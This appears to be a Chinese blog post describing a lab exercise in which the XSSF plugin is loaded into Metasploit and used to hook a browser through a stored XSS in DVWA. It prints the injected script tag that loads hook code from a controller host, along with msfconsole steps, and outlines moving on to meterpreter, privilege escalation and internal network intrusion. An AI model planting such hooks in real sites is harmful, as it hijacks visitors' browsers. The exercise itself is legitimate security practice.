Metaslploi2t-XSSF-DVWA实践
XSSF介绍
Cross-Site Scripting Framework (XSSF)是一款安全工具,使用它可以非常容易的利用跨站脚本(XSS)漏洞。XSSF项目的主要目的是展示XSS的实际危害。(XSS提权利用神器)
XSS的高级利用--->居然和神器Measploit挂钩呀
fInstall XSSF:
我的原则要写就写清楚来,不写就别写,写的给人看了稀里糊涂的,
心得:直接看说明书。看其他都是扯淡。。。。说明书路径:解压后./data/xssf/gui/help.html
大致阅读过后,里面的内容说明非常的详细。就不必再到网上搜了。。。我在这里碰了一鼻子的灰,下面讲述我遇到的出入。。。。
同时不能全按说明书来,环境不一样,也会遇到一些问题。比如在:Port=80上。这是我遇到的问题(XSSF那些纠结的事&update ruby)
大致原理:下载XSSF-2.2.zip解压,将4个文件cp到你的msf3/下即可。。。
问题一:cp -R “./”无法获取文件状态
解决:cp 不加双引号
然后看看msf3下的插件库有没有xssf.rb
我们开始加载#msfconsole msf>load xssf
其中要注意:先要查看下当前你数据库是否连接成功。msf>db_status。
成功加载后我们看看xssf所带的命令.msf>xssf_ 再双击tab键(msf>help xssf可看各命令使用说明)
接着我们看xssf中跨站需要插入的代码.这里我插入的是xssf test page中的链接(打开IE这个可以看到http://192.168.0.5:8888/test.html)
<script type="text/javascript" src="http://192.168.0.5:8888/loop?interval=5"></script>
再接着我们在DVWA上写入:注意安全级别为low.
再接着让我们回到XSSF界面。插入测试代码后我们返回metasploit中查看下xss:
显示 id=2 成功XSS (这里还有一个192.168.0.103是我在其他PC机上跨PC的XSS测试,期间遇到一些问题,将在后面blog中记录出来)
然后显示id 2 的具体XSS情况:
下一步,我这里的用的是:msf>use auxilary/xssf/public/misc/alert
╮(╯_╰)╭没想到结果是弹窗窗》》》》》你既然可以让他弹窗窗,深入一点不就。。。你邪恶了O(∩_∩)O
最后到这里还可以用一些针对浏览器的洞进行更深入的测试,得到meterpreter后进行提权,内网渗透等等。后续看XSSF help......因为还有更酷的GUI。
下篇,我将总结在这篇文章过程中我所遇到的bug....